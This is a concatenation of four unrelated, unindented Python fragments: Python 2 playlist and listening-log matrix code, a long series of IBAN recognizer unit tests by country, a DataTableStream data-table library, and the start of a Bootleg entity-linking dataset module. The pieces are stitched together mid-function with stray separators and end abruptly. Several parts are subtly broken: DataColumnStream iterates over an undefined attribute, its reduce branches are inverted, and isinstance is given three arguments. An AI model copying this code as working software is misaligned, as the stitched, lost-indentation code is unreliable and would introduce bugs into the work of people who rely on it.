print "FIX TID DONE"
self.tid_list = list(set(listening_log_table.tid))
user_list = list(set(listening_log_table.user))
self.tid_song_id_table = pd.DataFrame( # match to number id
[(v, i) for i, v in enumerate(self.tid_list)], columns=['tid', 'id'])
listening_log_table = listening_log_table.merge(
self.tid_song_id_table, on='tid') # merge number id ~ tid to listening log table
self.tid_song_id_table = self.tid_song_id_table.set_index('tid')
listening_log_table = listening_log_table.merge(pd.DataFrame(
list(enumerate(user_list)), columns=['user_id', 'user']), on='user')
self.matrix = scipy.sparse.csr_matrix((np.array(
listening_log_table[u'count']), (listening_log_table[u'id'], listening_log_table[u'user_id'])))
if reduced_dimension != None:
self.matrix = self.Dimension_Reduction(
self.matrix, reduced_dimension)
print 'finished processing dimension reduction'
print u"user tid matrix build"
def load_playlist_song_info(self, fix_tid_list):
if self.playlist_source == 'yes':
num_lines = sum(1 for line in open(
u'/data/jeffrey82221/YES/song_hash.txt'))
f = open(u'/data/jeffrey82221/YES/song_hash.txt', u'rt')
splitted = csv.reader(f, delimiter='\t', quotechar='|')
def remove_parenthese(string):
return re.sub(ur'\([^)]*\)', u'', string).strip()
name_matcher = imap(lambda x: (
int(x[0].strip()), (remove_parenthese(x[1]), remove_parenthese(x[2]))), splitted)
# playlist matching
playlist_key, name_matcher_ = it.tee(name_matcher)
name_table = pd.DataFrame(
list(name_matcher), columns=['song_id', 'name'])
print "playlist info LOAD"
f = open("/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
elements = imap(lambda x: x.replace("\n", "").split("<SEP>"), f)
track_id_table = pd.DataFrame.from_records(
elements, columns=[u'tid', u'echoid', u'artist', u'title'])
track_id_table['name'] = zip(
track_id_table['title'], track_id_table['artist'])
print "track_id_table info LOAD"
# a yes.com id may match to multiple tid , random choose one !
matched_table = track_id_table.merge(name_table, on='name', how='inner')[
['tid', 'song_id']]
id_nid_dict = dict()
for i, id in enumerate(matched_table.song_id):
if id in id_nid_dict:
id_nid_dict[id].append(i)
else:
id_nid_dict[id] = [i]
nids = map(lambda x: random.choice(x[1]), id_nid_dict.items())
self.tid_song_id_table = matched_table.iloc[nids]
self.tid_song_id_table = self.tid_song_id_table.set_index('tid')
elif self.playlist_source == 'aotm':
# tid_song_id_dict :::
# load unique song table (track info table )
# load the important from neighbor_dict keys
# match to tids
f = open("/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
elements = imap(lambda x: x.replace("\n", "").split("<SEP>"), f)
track_info_table = pd.DataFrame.from_records(
elements, columns=[u'tid', u'echoid', u'artist', u'title'])
track_info_table = track_info_table.set_index("echoid")
try:
f = open(u"playlist_song_ids", u"r")
playlist_song_ids = json.loads(f.read())
f.close()
except:
f = open(
'/data/jeffrey82221/playlist_aotm/aotm2011_playlists.json')
playlist_generator = imap(lambda x: list(
it.chain(*x)), ijson.items(f, "item.filtered_lists"))
playlist_generator = Count_Class(
playlist_generator, 10000, 'playlist').passing()
playlist_song_ids = list(
set(list(it.chain.from_iterable(playlist_generator))))
f = open(u"playlist_song_ids", u"w")
f.write(json.dumps(playlist_song_ids, ensure_ascii=False))
f.close()
self.tid_song_id_table = track_info_table.loc[playlist_song_ids][[
'tid']]
self.tid_song_id_table = self.tid_song_id_table.reset_index(
'echoid').set_index('tid')
self.tid_song_id_table.columns = ['song_id']
if fix_tid_list != None:
self.tid_song_id_table = self.tid_song_id_table.loc[fix_tid_list]
self.song_id_tid_table = self.tid_song_id_table.reset_index(
'tid').set_index('song_id')
# reduce the possibility that a song_id may match to multiple tid
self.tid_list = list(self.tid_song_id_table.index)
song_id_list = list(self.song_id_tid_table.index)
song_id_set = list(set(song_id_list))
nid_list = map(lambda id: song_id_list.index(id), song_id_set)
self.song_id_tid_table = self.song_id_tid_table.iloc[nid_list]
def load_playlist_info(self, fix_tid_list):
self.load_playlist_song_info(fix_tid_list)
# playlist song count : 119894
# if save neighbor dict : playlist source dependent and fix_tid_list dependent !
# imap filter out the irrelevent element in array
try:
if fix_tid_list != None:
f = open(self.playlist_source +
str(len(fix_tid_list)) + ".neighbor_dict", u"r")
neighbor_dict = json.loads(f.read())
f.close()
else:
f = open(self.playlist_source + ".neighbor_dict", u"r")
neighbor_dict = json.loads(f.read())
f.close()
print u"neighbor_dict LOAD"
except:
if self.playlist_source == "yes":
playlist_file = open(u'/data/jeffrey82221/YES/train.txt')
playlists_train = it.islice(
imap(lambda x: list(imap(int, x.split(u' ')[:-1])), playlist_file), 2, None)
playlist_file = open(u'/data/jeffrey82221/YES/test.txt')
playlists_test = it.islice(
imap(lambda x: list(imap(int, x.split(u' ')[:-1])), playlist_file), 2, None)
playlists = it.chain(playlists_train, playlists_test)
# remove not matchable songs from playlist
# remove
elif self.playlist_source == "aotm":
f = open(
'/data/jeffrey82221/playlist_aotm/aotm2011_playlists.json')
#playlist_generator = ijson.items(f, "item")
playlists = imap(lambda x: list(it.chain(*x)),
ijson.items(f, "item.filtered_lists"))
#playlists = cleaned_playlist_generator(playlist_generator)
if fix_tid_list != None:
fix_song_id_list = list(
self.tid_song_id_table.loc[fix_tid_list].song_id)
p = multiprocessing.Pool()
playlists = ifilter(lambda x: len(x) > 0, p.imap_unordered(
partial(filtering, fix_song_id_list=fix_song_id_list), playlists))
playlists = Count_Class(playlists, 100, 'playlist').passing()
# the begining song of itself should remain in the neighbor list
def neighbor_pair_generator(playlist):
for i in xrange(len(playlist)):
left = playlist[:i][::-1]
right = playlist[i + 1:]
if len(left) != 0 and len(right) != 0:
yield [playlist[i], [left, right]]
elif len(left) == 0:
yield [playlist[i], [right]]
elif len(right) == 0:
yield [playlist[i], [left]]
neighbor_pairs = it.chain.from_iterable(
imap(neighbor_pair_generator, playlists))
def clean_neighbor_pair(input):
return input[0], filter(lambda x: len(x) != 0, input[1])
neighbor_pairs = ifilter(lambda x: len(x[1]) > 0, imap(
clean_neighbor_pair, neighbor_pairs)) # the pair with song occur alone in the playlist after filtering is also filter out ! (they should be remain in the list)
neighbor_dict = dict()
for neighbor_pair in neighbor_pairs:
if neighbor_pair[0] in neighbor_dict:
neighbor_dict[neighbor_pair[0]].extend(neighbor_pair[1])
else:
neighbor_dict[neighbor_pair[0]] = neighbor_pair[1]
if fix_tid_list != None:
f = open(self.playlist_source +
str(len(fix_tid_list)) + ".neighbor_dict", u"w")
f.write(json.dumps(neighbor_dict, ensure_ascii=False))
f.close()
else:
f = open(self.playlist_source + ".neighbor_dict", u"w")
f.write(json.dumps(neighbor_dict, ensure_ascii=False))
f.close()
print u"neighbor_dict BUILD and SAVE"
self.neighbor_table = pd.DataFrame(neighbor_dict.items(), columns=[
'song_id', 'neighbor_list'])
self.neighbor_table = self.neighbor_table.set_index('song_id')
def random_select_an_id_from_list(self, input_id_list, weights=None, labeled_id_list=None):
# print type(input_id_list),len(input_id_list),type(weights),len(weights),type(labeled_id_list)
# print input_id_list
if type(input_id_list) == list or type(input_id_list) == np.ndarray:
if len(input_id_list) != 0:
if type(labeled_id_list) != type(None):
if type(weights) != type(None):
id_list_weight_pairs = filter(
lambda x: x[0] in labeled_id_list, zip(input_id_list, weights))
filtered_id_list = map(
lambda x: x[0], id_list_weight_pairs)
filtered_weights = map(
lambda x: x[1], id_list_weight_pairs)
else:
filtered_id_list = list(
set(labeled_id_list) & set(input_id_list))
filtered_weights = None
# filter with weights
if len(filtered_id_list) != | |
= 'LI21 0881 0000 2324 013A B'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Lithuania (16n) LTkk bbbb bccc cccc cccc
def test_LT_iban_valid_no_spaces(self):
iban = 'LT121000011101001000'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 20, EntityRecognizer.MAX_SCORE)
def test_LT_iban_valid_with_spaces(self):
iban = 'LT12 1000 0111 0100 1000'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
def test_LT_iban_invalid_format_valid_checksum(self):
iban = 'LT12 A000 0111 0100 1000'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_LT_iban_valid_checksum(self):
iban = 'LT12 1000 0111 0100 1001'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Luxembourg (3n,13c) LUkk bbbc cccc cccc cccc
def test_LU_iban_valid_no_spaces(self):
iban = 'LU280019400644750000'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 20, EntityRecognizer.MAX_SCORE)
def test_LU_iban_valid_with_spaces(self):
iban = 'LU28 0019 4006 4475 0000'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
def test_LU_iban_invalid_format_valid_checksum(self):
iban = 'LU28 A019 4006 4475 0000'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_LU_iban_valid_checksum(self):
iban = 'LU28 0019 4006 4475 0001'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Malta (4a,5n,18c) MTkk bbbb ssss sccc cccc cccc cccc ccc
def test_MT_iban_valid_no_spaces(self):
iban = 'MT84MALT011000012345MTLCAST001S'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 31, EntityRecognizer.MAX_SCORE)
def test_MT_iban_valid_with_spaces(self):
iban = 'MT84 MALT 0110 0001 2345 MTLC AST0 01S'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 38, EntityRecognizer.MAX_SCORE)
def test_MT_iban_invalid_format_valid_checksum(self):
iban = 'MT84 MALT A110 0001 2345 MTLC AST0 01S'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MT_iban_valid_checksum(self):
iban = 'MT84 MALT 0110 0001 2345 MTLC AST0 01T'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Mauritania (23n) MRkk bbbb bsss sscc cccc cccc cxx
def test_MR_iban_valid_no_spaces(self):
iban = 'MR1300020001010000123456753'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 27, EntityRecognizer.MAX_SCORE)
def test_MR_iban_valid_with_spaces(self):
iban = 'MR13 0002 0001 0100 0012 3456 753'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 33, EntityRecognizer.MAX_SCORE)
def test_MR_iban_invalid_format_valid_checksum(self):
iban = 'MR13 A002 0001 0100 0012 3456 753'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MR_iban_valid_checksum(self):
iban = 'MR13 0002 0001 0100 0012 3456 754'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Mauritius (4a,19n,3a) MUkk bbbb bbss cccc cccc cccc 000m mm
def test_MU_iban_valid_no_spaces(self):
iban = 'MU17BOMM0101101030300200000MUR'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 30, EntityRecognizer.MAX_SCORE)
def test_MU_iban_valid_with_spaces(self):
iban = 'MU17 BOMM 0101 1010 3030 0200 000M UR'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 37, EntityRecognizer.MAX_SCORE)
def test_MU_iban_invalid_format_valid_checksum(self):
iban = 'MU17 BOMM A101 1010 3030 0200 000M UR'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MU_iban_valid_checksum(self):
iban = 'MU17 BOMM 0101 1010 3030 0200 000M US'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Moldova (2c,18c) MDkk bbcc cccc cccc cccc cccc
def test_MD_iban_valid_no_spaces(self):
iban = 'MD24AG000225100013104168'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
def test_MD_iban_valid_with_spaces(self):
iban = 'MD24 AG00 0225 1000 1310 4168'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 29, EntityRecognizer.MAX_SCORE)
def test_MD_iban_invalid_format_valid_checksum(self):
iban = 'MD24 AG00 0225 1000 1310 4168 9'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MD_iban_valid_checksum(self):
iban = 'MD24 AG00 0225 1000 1310 4169'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Monaco (10n,11c,2n) MCkk bbbb bsss sscc cccc cccc cxx
def test_MC_iban_valid_no_spaces(self):
iban = 'MC5811222000010123456789030'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 27, EntityRecognizer.MAX_SCORE)
def test_MC_iban_valid_with_spaces(self):
iban = 'MC58 1122 2000 0101 2345 6789 030'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 33, EntityRecognizer.MAX_SCORE)
def test_MC_iban_invalid_format_valid_checksum(self):
iban = 'MC58 A122 2000 0101 2345 6789 030'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MC_iban_valid_checksum(self):
iban = 'MC58 1122 2000 0101 2345 6789 031'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Montenegro (18n) MEkk bbbc cccc cccc cccc xx
def test_ME_iban_valid_no_spaces(self):
iban = 'ME25505000012345678951'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 22, EntityRecognizer.MAX_SCORE)
def test_ME_iban_valid_with_spaces(self):
iban = 'ME25 5050 0001 2345 6789 51'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 27, EntityRecognizer.MAX_SCORE)
def test_ME_iban_invalid_format_valid_checksum(self):
iban = 'ME25 A050 0001 2345 6789 51'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_ME_iban_valid_checksum(self):
iban = 'ME25 5050 0001 2345 6789 52'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Netherlands (4a,10n) NLkk bbbb cccc cccc cc
def test_NL_iban_valid_no_spaces(self):
iban = 'NL91ABNA0417164300'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 18, EntityRecognizer.MAX_SCORE)
def test_NL_iban_valid_with_spaces(self):
iban = 'NL91 ABNA 0417 1643 00'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 22, EntityRecognizer.MAX_SCORE)
def test_NL_iban_invalid_format_valid_checksum(self):
iban = 'NL91 1BNA 0417 1643 00'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_NL_iban_valid_checksum(self):
iban = 'NL91 ABNA 0417 1643 01'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# North Macedonia (3n,10c,2n) MKkk bbbc cccc cccc cxx
def test_MK_iban_valid_no_spaces(self):
iban = 'MK07250120000058984'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 19, EntityRecognizer.MAX_SCORE)
def test_MK_iban_valid_with_spaces(self):
iban = 'MK07 2501 2000 0058 984'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 23, EntityRecognizer.MAX_SCORE)
def test_MK_iban_invalid_format_valid_checksum(self):
iban = 'MK07 A501 2000 0058 984'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MK_iban_valid_checksum(self):
iban = 'MK07 2501 2000 0058 985'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Norway (11n) NOkk bbbb cccc ccx
def test_NO_iban_valid_no_spaces(self):
iban = 'NO9386011117947'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 15, EntityRecognizer.MAX_SCORE)
def test_NO_iban_valid_with_spaces(self):
iban = 'NO93 8601 1117 947'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 18, EntityRecognizer.MAX_SCORE)
def test_NO_iban_invalid_format_valid_checksum(self):
iban = 'NO93 A601 1117 947'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_NO_iban_valid_checksum(self):
iban = 'NO93 8601 1117 948'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Pakistan (4c,16n) PKkk bbbb cccc cccc cccc cccc
def test_PK_iban_valid_no_spaces(self):
iban = 'PK36SCBL0000001123456702'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
def test_PK_iban_valid_with_spaces(self):
iban = 'PK36 SCBL 0000 0011 2345 6702'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 29, EntityRecognizer.MAX_SCORE)
def test_PK_iban_invalid_format_valid_checksum(self):
iban = 'PK36 SCBL A000 0011 2345 6702'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_PK_iban_valid_checksum(self):
iban = 'PK36 SCBL 0000 0011 2345 6703'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Palestinian territories (4c,21n) PSkk bbbb xxxx xxxx xccc cccc cccc c
def test_PS_iban_valid_no_spaces(self):
iban = 'PS92PALS000000000400123456702'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 29, EntityRecognizer.MAX_SCORE)
def test_PS_iban_valid_with_spaces(self):
iban = 'PS92 PALS 0000 0000 0400 1234 5670 2'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 36, EntityRecognizer.MAX_SCORE)
def test_PS_iban_invalid_format_valid_checksum(self):
iban = 'PS92 PALS A000 0000 0400 1234 5670 2'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_PS_iban_valid_checksum(self):
iban = 'PS92 PALS 0000 0000 0400 1234 5670 3'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Poland (24n) PLkk bbbs sssx cccc cccc cccc cccc
def test_PL_iban_valid_no_spaces(self):
iban = 'PL61109010140000071219812874'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 28, EntityRecognizer.MAX_SCORE)
def test_PL_iban_valid_with_spaces(self):
iban = 'PL61 1090 1014 0000 0712 1981 2874'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 34, EntityRecognizer.MAX_SCORE)
def test_PL_iban_invalid_format_valid_checksum(self):
iban = 'PL61 A090 1014 0000 0712 1981 2874'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_PL_iban_valid_checksum(self):
iban = 'PL61 1090 1014 0000 0712 1981 2875'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Portugal (21n) PTkk bbbb | |
from collections import defaultdict, Counter
from datatable_util import AttributeDict, CSV_GivenHeaders, FIXEDWIDTH, JoinType, sortKey
from hierarchies import Hierarchy
import os
from datatable import DataTable, DataColumn
from itertools import chain
from functools import reduce
def createColumnFilter(criteria):
if criteria is None:
return lambda value: value is None
if '__call__' in dir(criteria):
return lambda value: criteria(value)
if isinstance(criteria, DataColumnStream):
otherValues = set(criteria)
return lambda value: value in otherValues
if '__contains__' in dir(criteria) and not isinstance(criteria, str):
return lambda value: value in criteria
return lambda value: value == criteria
class KeyParamedDefaultDict(dict):
def __init__(self, defaultMethod, *args, **kwargs):
super(KeyParamedDefaultDict, self).__init__(*args, **kwargs)
self.defaultMethod = defaultMethod
def __getitem__(self, key):
if key not in self:
self[key] = self.defaultMethod(key)
return super(KeyParamedDefaultDict, self).__getitem__(key)
class DataColumnStream(object):
def __init__(self, dataTableStream, header):
self.__dataTableStream = dataTableStream
if isinstance(header, (DataColumnStream, DataColumn)):
self.header = header.header
else:
self.header = header
def __iter__(self):
for row in self.__dataTable:
yield row[self.header]
def __getitem__(self, index):
'''Gets the index'th row of data'''
if '__iter__' in dir(index) or isinstance(index, slice):
return self.__dataTableStream[index].column(self.header)
for i, v in enumerate(self):
if i == index:
return v
return None
def toList(self):
return list(self)
def first(self):
for value in self:
return value
return None
def reduce(self, reductionMethod, startingValue=None):
if startingValue is None:
return reduce(reductionMethod, self, startingValue)
return reduce(reductionMethod, self)
def last(self):
return self.reduce(lambda a, b: b)
def max(self):
return max(self)
def min(self):
return min(self)
def filter(self, value):
'''
Filter the table by matching this column with the given value
Value may be one of the following:
None - returns rows where this column is None
DataColumn (same table) - returns rows where the two columns are equal
DataColumn (other table) - returns rows where this column value is in the other column
method - returns rows where method returns true for column value
collection - returns rows where column value is in the collection
value - returns rows where column value equals the given value
'''
criteria = createColumnFilter(value)
return DataTableStream((row for row in self.__dataTableStream if criteria(row[self.header])), self.__dataTableStream.headers())
def set(self, value):
'''
sets the items in this column to the given value
If value is a function then sets each item to the result of calling value on the item
returns the modified datatable
'''
if hasattr(value, '__call__'):
transform = lambda row: row + {self.header: value(row[self.header])}
else:
transform = lambda row: row + {self.header: value}
return DataTableStream((transform(row) for row in self.__dataTableStream), self.__dataTableStream.headers())
def sizeOfGroups(self):
return Counter(self)
def __repr__(self):
return "DataColumnStream(<dataTable>, '%s')" % self.header
def __str__(self):
return ','.join(map(str, self))
class DataTableStream(object):
def __init__(self, rows, headers):
self.__rows = rows
self.__headers = headers
self.__columns = KeyParamedDefaultDict(lambda header: DataColumnStream(self, header))
def __iter__(self):
'''Gets an iterator over the data rows'''
return iter(self.__rows)
def __getitem__(self, index):
'''Gets the index'th row of data'''
if '__iter__' in dir(index):
criteria = lambda i: i in set(index)
elif isinstance(index, slice):
criteria = lambda i: index.start <= i <= index.stop and (i - index.start) % index.step == 0
else:
for i, row in enumerate(self):
if i == index:
return row
return None
return DataTableStream((row for i, row in enumerate(self) if criteria(i)), self.__headers)
def column(self, header):
'''Gets the column named 'header' (same as dataTable.<header>)'''
return self.__columns[header]
def __getattr__(self, header):
return self.column(header)
def columns(self):
'''Returns the DataColumn objects associated with this DataTable'''
return [self.column(header) for header in self.__headers]
def headers(self):
'''Returns this table's header strings'''
return self.__headers
def filter(self, filterFunction):
'''Returns a DataTable containing the lines in self filtered by the given filterFunciton
Accepts either a dictionary of header -> value which does exact matching on the pairs,
or a filter function which takes a dict as input and returns if that row should be included'''
if isinstance(filterFunction, dict):
filters = {k: createColumnFilter(v) for k, v in filterFunction.items()}
criteria = lambda row: all(v(row[k]) for k, v in filters)
else:
criteria = filterFunction
return DataTableStream((row for row in self if criteria(row)), self.__headers)
def transform(self, transformFunction, newHeaders=None):
return DataTableStream((transformFunction(row) for row in self), newHeaders or set())
def index(self, keyHeaders, leafHeaders=None):
if leafHeaders is None:
leafHeaders = set(self.headers()).difference(keyHeaders)
return Hierarchy.fromTable(self, keyHeaders, leafHeaders)
def __str__(self):
return self | FIXEDWIDTH
def __repr__(self):
return 'DataTableStream(<dataTable>)\nHeaders:\n%s' % self.headers()
def augment(self, other):
'''append the rows in other to the rows in this
if the headers don't match between the two instances then it adds blank columns to each with the headers from the other'''
if isinstance(other, DataTableStream, DataTable):
headers = set(self.__headers).union(other.headers())
else:
headers = self.__headers
if isinstance(other, dict):
stream = chain(self, [other])
else:
stream = chain(self, other)
return DataTableStream(({header: row.get(header, None) for header in headers} for row in stream), headers)
def append(self, other):
'''append the rows in the other to the rows in this
requires that the headers match (or that one of self or other be empty)'''
if isinstance(other, dict):
stream = chain(self, [other])
else:
stream = chain(self, other)
return DataTableStream(stream, self.__headers)
def remove(self, other):
'''remove the rows from other that are in self - uses exact match of rows'''
if isinstance(other, dict):
criteria = lambda row: row != other
else:
criteria = lambda row: row not in other
return self.filter(criteria)
def extend(self, other):
'''Add columns to the data using the dictionary keys from other as the new headers and their values as fields on each row
Overwrites existing columns'''
if hasattr(other, '__call__'):
transform = lambda row: row + other(row)
else:
def transform(row):
def it():
for header, value in other.items():
if hasattr(value, '__call__'):
yield header, value(row)
else:
yield header, value
return row + dict(it())
return self.transform(transform)
def __or__(self, other):
'''Pipes the data into other
Calls other with an iterator for the rows in self'''
return other(iter(self))
def exclude(self, other): #not compatible with existing functions
'''remove column(s) from the data table
other may be either a header or list of headers,
or a predicate which takes a header and the set of data in that column'''
if '__call__' in dir(other):
data = list(self)
length = len(data)
data = {header: [row[header] for row in data] for header in self.__headers}
data = {header: values for header, values in data.items() if not other(header, values)}
return DataTableStream(({header: values[i] for header, values in data.items()} for i in range(length)), data.keys())
if other in self.__headers:
other = {other}
else:
other = set(other)
transform = lambda row: {header: value for header, value in row.items() if header not in other}
return self.transform(transform, {header for header in self.__headers if header not in other})
def project(self, other): #not compatible with existing functions
'''filter columns in the data table
other may be either a header or list of headers,
or a predicate which takes a header and the set of data in that column'''
if '__call__' in dir(other):
data = list(self)
length = len(data)
data = {header: [row[header] for row in data] for header in self.__headers}
data = {header: values for header, values in data.items() if other(header, values)}
return DataTableStream(({header: values[i] for header, values in data.items()} for i in range(length)), data.keys())
if other in self.__headers:
other = {other}
else:
other = set(other)
transform = lambda row: {header: value for header, value in row.items() if header in other}
return self.transform(transform, {header for header in self.__headers if header in other})
def removeBlankColumns(self):
'''returns a copy of this DataTable with all of the blank columns removed'''
return self.project(lambda header, values: any(values))
def sorted(self, *fields):
def key(row):
return tuple(sortKey(row.get(field, None)) for field in fields)
return DataTable(sorted(self, key=key))
def iterBucket(self, *fields):
copy = self.sorted(*fields)
currentKey = None
currentBucket = []
for data in copy:
key = tuple(data[field] for field in fields)
if currentKey is not None and key != currentKey:
yield currentKey, DataTable(currentBucket)
currentBucket = []
currentKey = key
currentBucket.append(data)
yield currentKey, DataTable(currentBucket)
def sizeOfBuckets(self, *fields):
'''Returns a dict of bucket -> number of items in the bucket'''
return Counter(tuple(row[field] for field in fields) for row in self)
def bucket(self, *fields):
'''Returns a dict of bucket -> DataTable of rows matching that bucket'''
buckets = defaultdict(lambda:[])
for data in self:
key = tuple(data[field] for field in fields)
buckets[key].append(data)
return AttributeDict((key, DataTable(bucket)) for key, bucket in buckets.items())
def filterBucket(self, predicate, *fields):
'''Filter the datatable using an aggregate predicate
fields specifies how the data will be grouped
predicate is a method which takes a bucket of data and returns if the bucket should be included in the result
'''
return DataTableStream(row for key, bucket in self.iterBucket(*fields) if predicate(bucket) for row in bucket)
def join(self, other, joinParams=None, otherFieldPrefix='', joinType=JoinType.LEFT_OUTER_JOIN):
'''
dataTable.join(otherTable, joinParams, otherFieldPrefix='')
returns a new table with rows in the first table joined with rows in the second table, using joinParams to map fields in the first to fields in the second
Parameters:
other - the table to join
joinParams - a dictionary of <field in self> to <field in other>. Defaults to "natural join", merging common headers
otherFieldPrefix - a string to prepend to the fields added from the second table
joinType - the instance of JoinType which indicates if items should be included in one data table which aren't in the other
'''
if joinParams is None:
joinParams = {h: h for h in self.headers() if h in other.headers()}
elif not isinstance(joinParams, dict):
raise Exception("joinParams must be a dictionary of <field in self> to <field in other>")
selfJoinHeaders = list(joinParams.values())
otherJoinHeaders = [joinParams[h] for h in selfJoinHeaders]
newOtherHeaders = {(v if v in joinParams.values() else otherFieldPrefix + v) for v in otherJoinHeaders}
otherBuckets = other.extend(
lambda row: {otherFieldPrefix + v: row[v] for v in other.headers() if v not in otherJoinHeaders}
).project(newOtherHeaders
).bucket(*otherJoinHeaders)
emptyOtherRow = AttributeDict({otherFieldPrefix + v: None for v in other.headers() if v not in otherJoinHeaders})
emptySelfRow = AttributeDict({header: None for header in self.headers() if header not in selfJoinHeaders})
otherKeysSeen = set()
def it():
for row | |
"""Bootleg NED Dataset."""
import logging
import multiprocessing
import os
import re
import shutil
import sys
import time
import traceback
import warnings
from collections import defaultdict
import numpy as np
import torch
import ujson
from emmental.data import EmmentalDataset
from tqdm import tqdm
from bootleg import log_rank_0_debug, log_rank_0_info
from bootleg.layers.alias_to_ent_encoder import AliasEntityTable
from bootleg.symbols.constants import ANCHOR_KEY, PAD_ID, STOP_WORDS
from bootleg.symbols.entity_symbols import EntitySymbols
from bootleg.symbols.kg_symbols import KGSymbols
from bootleg.symbols.type_symbols import TypeSymbols
from bootleg.utils import data_utils, utils
warnings.filterwarnings(
"ignore",
message="Could not import the lzma module. Your installed Python is incomplete. "
"Attempting to use lzma compression will result in a RuntimeError.",
)
warnings.filterwarnings(
"ignore",
message="FutureWarning: Passing (type, 1) or '1type'*",
)
logger = logging.getLogger(__name__)
# Removes warnings about TOKENIZERS_PARALLELISM
os.environ["TOKENIZERS_PARALLELISM"] = "false"
class InputExample(object):
"""A single training/test example for prediction."""
def __init__(
self,
sent_idx,
subsent_idx,
alias_list_pos,
alias_to_predict,
span,
phrase,
alias,
qid,
qid_cnt_mask_score,
):
"""Init InputExample."""
assert (
type(sent_idx) is int
), f"We need the sentence index is an int. You have {type(sent_idx)}"
self.sent_idx = int(sent_idx)
self.subsent_idx = subsent_idx
self.alias_list_pos = alias_list_pos
self.alias_to_predict = alias_to_predict
self.span = span
self.phrase = phrase
self.alias = alias
self.qid = qid
self.qid_cnt_mask_score = qid_cnt_mask_score
def to_dict(self):
"""Return dictionary of object."""
return {
